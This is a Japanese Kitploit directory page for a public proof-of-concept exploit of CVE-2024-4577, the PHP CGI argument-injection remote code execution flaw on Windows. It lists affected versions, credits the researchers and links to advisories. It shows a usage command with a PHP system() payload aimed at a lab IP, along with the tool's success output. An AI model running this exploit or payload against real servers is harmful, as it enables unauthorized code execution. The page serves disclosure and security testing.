Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-4577 — PHP CGI 引数インジェクション (CVE-2024-4577) リモートコード実行 PoC | Kitploit
ツール/GitHubGitHub/watchtowrlabs/cve-2024-4577
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミングペイロード開発
GitHubwatchtowrlabs/cve-2024-4577

CVE-2024-4577

PHP CGI 引数インジェクション (CVE-2024-4577) リモートコード実行 PoC

リポジトリを見る
317652年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-4577

@watchTowr によって開発された概念実証 (PoC) です。PHP CGI 引数注入の脆弱性 (CVE-2024-4577) を悪用し、Windows 環境で実行されている脆弱な PHP バージョンに対して RCE を取得します。この脆弱性の詳細な技術分析

Orange Tsi 🍊

この脆弱性は、DEVCORE (@d3vc0r3) の Orange Tsai (@orange_8361) によって発見されました。彼の優れた研究をぜひフォローしてください。私たちの役割は、この問題のエクスプロイトを再現し、開発することだけでした。

PoC || GTFO

root@kitploit:~
python watchTowr-vs-php_cve-2024-4577.py -c "<?php system('calc');?>" -t http://192.168.253.132/test.sina
                         __         ___  ___________
         __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________
         \ \/ \/ \__  \    ___/ ___\|  |  \|    | /  _ \ \/ \/ \_  __ \
          \     / / __ \|  | \  \___|   Y  |    |(  <_> \     / |  | \/
           \/\_/ (____  |__|  \___  |___|__|__  | \__  / \/\_/  |__|
                                  \/          \/     \/

        watchTowr-vs-php_cve-2024-4577.py
        (*) PHP CGI Argument Injection (CVE-2024-4577) discovered by Orange Tsai (@orange_8361) of DEVCORE (@d3vc0r3)
          - Aliz Hammond, watchTowr ([email protected])
          - Sina Kheirkhah (@SinSinology), watchTowr ([email protected])
        CVEs: [CVE-2024-4577]
(^_^) prepare for the Pwnage (^_^)

(+) Exploit was successful

影響を受けるバージョン

元の DEVCORE (@d3vc0r3) によるブログ記事 に基づくと、この脆弱性は Windows オペレーティングシステムにインストールされたすべてのバージョンの PHP に影響します:

root@kitploit:~
PHP 8.3 < 8.3.8
PHP 8.2 < 8.2.20
PHP 8.1 < 8.1.29

PHP 8.0、PHP 7、PHP 5 のブランチは End-of-Life となり、もはやメンテナンスされていないため、サーバー管理者は こちら の「Am I Vulnerable」セクションを参照し、「Mitigation Measure」セクションにある一時的なパッチの推奨事項を見つけることができます。

エクスプロイト作者

watchTowr (@watchtowrcyber) の Aliz (@AlizTheHax0r) と Sina Kheirkhah (@SinSinology)

watchTowr Labs をフォロー

最新のセキュリティ研究については、watchTowr Labs チームをフォローしてください。

  • https://labs.watchtowr.com/
  • https://twitter.com/watchtowrcyber
  • https://devco.re/blog/2024/06/06/security-alert-cve-2024-4577-php-cgi-argument-injection-vulnerability-en/
  • https://blog.orange.tw/2024/06/cve-2024-4577-yet-another-php-rce.html
  • https://labs.watchtowr.com/no-way-php-strikes-again-cve-2024-4577/
ツールをダウンロード